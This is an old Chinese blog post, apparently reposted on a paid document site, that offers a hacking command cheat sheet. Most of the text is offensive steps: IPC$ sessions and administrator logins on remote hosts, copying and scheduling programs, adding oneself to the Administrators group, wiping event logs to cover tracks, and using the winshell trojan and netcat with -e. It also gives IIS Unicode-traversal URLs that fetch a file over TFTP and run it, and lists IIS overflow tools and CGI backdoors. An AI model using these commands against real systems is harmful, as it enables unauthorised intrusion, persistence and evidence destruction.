管和黑客都必须知道的东东

4787177090|我的消息(2/2)|我的空间|百度空间|百度首页|退出無聊之書る寂寞之味身體是革命的本錢,健康是身體的根本,只有健康的體魄,才有美好的未來主页博客相册个人档案好友查看文章网管和黑客都必须知道的命令2007年12月22日星期六18:01与远程主机建立空管连接netuse\IP地址ipc$""/use:""以管理员身份登录远程主机netuse\IP地址ipc$"密码"/use:"Administrator"传送文件到远程主机WINNT目录下copy本机目录路径程序\IP地址admin$查看远程主机时间nettime\IP地址定时启动某个程序at\IP地址02:18readme.exe查看共享netview\IP地址查看netbios工作组列表nBTstat-AIP地址将远程主机C盘映射为自己的F盘netusef:\IP地址c$""/user:"Administrator"这两条把自己增加到管理员组:netuser用户名密码/addnetlocaLGroupAdministrators用户名/add断开连接netuse\IP地址ipc$/delete扫尾:delC:winntsystem32logfiles*.*delC:winntssytem32config*.evtdelC:winntsystem32dTCLog*.*delC:winntsystem32*.logdelC:winntsystem32*.txtdelC:winnt*.txtdelC:winnt*.log一、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc/list\IP地址netsvcschedule\IP地址/querynetsvc\IP地址schedule/start二、OpenTelnet.exe远程启动主机的Telnet服务,并绑定端口到7878,例如:OpenTelnet\IP地址用户名密码17878然后就可以telnet到主机的7878端口,进入DOS方式下:telnetIP地址7878三、winshell.exe一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:pPath(查看winshell主程序的路径信息)breBoot(重新启动机器)dshutDown(关闭机器)sShell(执行后你就会看到可爱的“C:>”)xeXit(退出本次登录会话,此命令并不终止winshell的运行)CMD>http://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)四、3389登陆器,GUI方式登录远程主机的五、elsave.exe事件日志清除工具elsave-s\IP地址-l"application"-Celsave-s\IP地址-l"system"-Celsave-s\IP地址-l"security"-C执行后成功清除应用程序日志,系统日志,安全日志六、hbulot.exe开启win2kserver和winxp的3389服务hbulot(/r)七、nc.exe(netcat.exe)一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。想要连接到某处:nc(-options)hostnameport(s)(ports)...绑定端口等待连接:nc-l-pport(-options)(hostname)(port)参数:-eprog程序重定向,一旦连接,就执行(危险!)-ggatewaysource-routinghoppoint(s),upto8-Gnumsource-routingpointer:4,8,12,...-h帮助信息-isecs延时的间隔-l监听模式,用于入站连接-n指定数字的IP地址,不能用hostname-ofile记录16进制的传输-pport本地端口号-r任意指定本地及远程端口-saddr本地源地址-uUDP模式-v详细输出——用两个-v可得到更详细的内容-wsecstimeout的时间-z将输入输出关掉——用于扫描时八、TFTPD32.EXE把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本机IP地址get文件名c:winntsystem32文件名然后可以直接令文件运行:http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名九、prihack.exe是IIS的printer远程缓冲区溢出工具idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接类别:电脑知识|添加到搜藏|浏览(20)|评论(0)上一篇:教您如何识别非法进程附手工杀...下一篇:九招让硬盘更快、系统更稳相关文章:•网管和黑客都必须知道的命令!(1...•计算机网络基础知识.....黑客或...最近读者:478717709行运天空网友评论:发表评论:姓名:478717709内容:插入表情▼闪光字验证码:请点击后输入四位验证码,字母不区分大小写©2009Baidu

1、当您付费下载文档后,您只拥有了使用权限,并不意味着购买了版权,文档只能用于自身使用,不得用于其他商业用途(如 [转卖]进行直接盈利或[编辑后售卖]进行间接盈利)。
2、本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供参考,付费前请自行鉴别。
3、如文档内容存在侵犯商业秘密、侵犯著作权等,请点击“举报”。

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

客服邮箱:

biganzikefu@outlook.com

所有的文档都被视为“模板”,用于写作参考,下载前须认真查看,确认无误后再购买;

文档大部份都是可以预览的,笔杆子文库无法对文档的真实性、完整性、准确性以及专业性等问题提供审核和保证,请慎重购买;

文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为依据;

如果您还有什么不清楚的或需要我们协助,可以联系客服邮箱:

biganzikefu@outlook.com

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

笔杆子文秘
机构认证
内容提供者

为您提供优质文档,供您参考!

确认删除?